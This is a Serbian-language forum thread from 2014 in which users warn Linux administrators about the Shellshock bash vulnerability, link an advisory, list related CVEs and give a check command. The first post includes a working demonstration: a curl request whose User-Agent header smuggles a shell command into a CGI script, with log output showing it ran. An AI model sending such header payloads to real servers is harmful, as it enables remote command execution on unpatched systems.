MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Shellsock - bash remote code execution

Napisano na dan: 25.9.2014

Shellsock - bash remote code execution
Sledeća strana Pagination

Idi na vrh

Poslao: 25 Sep 2014 15:52
Idi na vrh
offline
  • Pridružio: 26 Avg 2005
  • Poruke: 384
  • Gde živiš: Beograd

Samo malo obavestenje za sve Linux admine juce je otkriveno da su sve verzije bash-a ranjive. Update jako preporucljiv.
Vise info-a
https://securityblog.redhat.com/2014/09/24/bash-sp.....on-attack/
random primer sa neta:


[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Poslao: 28 Sep 2014 08:56
Idi na vrh
offline
  • Pridružio: 17 Jan 2014
  • Poruke: 573
  • Gde živiš: Ulm , Germany

Napisano: 26 Sep 2014 14:20

pogodjeni su i osx i uniix systemi sa ovim
kod ubuntu-a (svih verzija) fix ce biti implementiran putem redovnog update-a
inace, ova "rupa" je prisutna vec duzi niz godina ali opet je tesko koristiti dati propust jer korisnik sam mora da napravi fajl u /var folderu

Dopuna: 28 Sep 2014 8:55

test komanda za proveru je:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
postoje 4 ranjivost koje su javne i jedna koja se tek utvrdjuje.
CVE-2014-6271
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

CVE-2014-6277

detaljniji test vrsi skripta:
script by hannob

ne bi bilo lose da OP promeni naziv teme u #shellsock ili #bashbug



Poslao: 28 Sep 2014 09:18
Idi na vrh
offline
  • bocke  Male
  • Moderator foruma
  • Glavni moderator Linux foruma
  • Veliki Pingvin
  • Guru
  • Pridružio: 16 Dec 2005
  • Poruke: 12488
  • Gde živiš: Južni pol

Pošto imamo forum koji se malo ozbiljnije bavi propustima, premeštam temu tamo.

MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Ko je trenutno na forumu
 

Ukupno su 921 korisnika na forumu :: 50 registrovanih, 6 sakrivenih i 865 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: _Rade, A.R.Chafee.Jr., aleksmajstor, anbeast, babaroga, bankulen, Bloody, Bobrock1, bokisha253, Boris90, BORUTUS, dehhhhi, dekan.m, Dimitrise93, DragoslavS, FileFinder, Frunze, Georgius, goxin, HrcAk47, hyla, ILGromovnik, kolle.the.kid, Koridor, Kubovac, kybonacci, Marko Marković, MB120mm, mercedesamg, milenko crazy north, Milometer, MiroslavD, MrNo, pacika, powSrb, procesor, S1Mk3, slonic_tonic, Smajser, Stoilkovic, TheBeastOfMG, theNedjeljko, Trpe Grozni, wizzardone, YU-UKI, Zeks, zillbg, Zoca, zziko, |_MeD_|